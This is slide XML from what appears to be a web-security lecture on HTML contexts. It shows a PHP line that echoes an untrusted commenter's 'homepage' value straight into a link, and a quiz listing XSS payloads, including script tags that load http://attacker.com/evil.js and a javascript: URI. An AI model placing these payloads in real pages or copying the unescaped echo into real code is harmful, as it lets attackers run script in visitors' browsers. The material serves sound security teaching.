        <p:spPr>
          <a:xfrm>
            <a:off x="5336031" y="3000247"/>
            <a:ext cx="1297092" cy="254557"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDFBF5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="847">
              <a:lnSpc>
                <a:spcPts val="1933"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$homepage</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="2841685"/>
            <a:ext cx="10522373" cy="428387"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="5975624" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Which</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>values</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>for	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>cause</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>execution?</a:t>
            </a:r>
            <a:endParaRPr sz="2667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="37073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DFBF5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="3970731"/>
            <a:ext cx="8956040" cy="1195860"/>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solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>src=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>"http:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/attacker.com/evil.js</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>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F0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'&lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>src="</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://attacker.com/evil.js"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>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1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>javascript:alert("evil</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1F1F1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>executing");</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>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568" y="450638"/>
            <a:ext cx="4631267" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-120" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Contexts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="731520" y="2488184"/>
            <a:ext cx="7657253" cy="307339"/>
            <a:chOff x="548640" y="1866138"/>
            <a:chExt cx="5742940" cy="230504"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="548640" y="1866138"/>
              <a:ext cx="243840" cy="230504"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="243840" h="230505">
                  <a:moveTo>
                    <a:pt x="243840" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243840" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243840" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FCF8E2"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="792480" y="1866137"/>
              <a:ext cx="5131435" cy="230504"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5131435" h="230505">
                  <a:moveTo>
                    <a:pt x="733031" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="611124" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121920" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121920" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611124" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733031" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733031" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5131435" h="230505">
                  <a:moveTo>
                    <a:pt x="2077199" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1709928" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1222248" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733044" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733044" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1222248" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1709928" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077199" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077199" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5131435" h="230505">
                  <a:moveTo>
                    <a:pt x="5131308" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5131308" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077212" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077212" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5131308" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5131308" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FDFBF5"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5923787" y="1866138"/>
              <a:ext cx="367665" cy="230504"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="367664" h="230505">
                  <a:moveTo>
                    <a:pt x="367284" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367284" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367284" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FCF8E2"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1622551"/>
            <a:ext cx="10049933" cy="1161280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> blogging</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>accepts</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13"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‘homepage’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>anonymous </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-579" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>commenter.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> The application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>uses</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>display</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>helpful</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>link:</a:t>
            </a:r>
            <a:endParaRPr sz="2667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2485"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"&lt;a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href='"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$homepage</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"'&gt;Home&lt;/a&gt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8388095" y="24881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CF8E2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5336031" y="3000247"/>
            <a:ext cx="1297092" cy="254557"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDFBF5"/>
          </a:solidFill>
        </p:spPr>
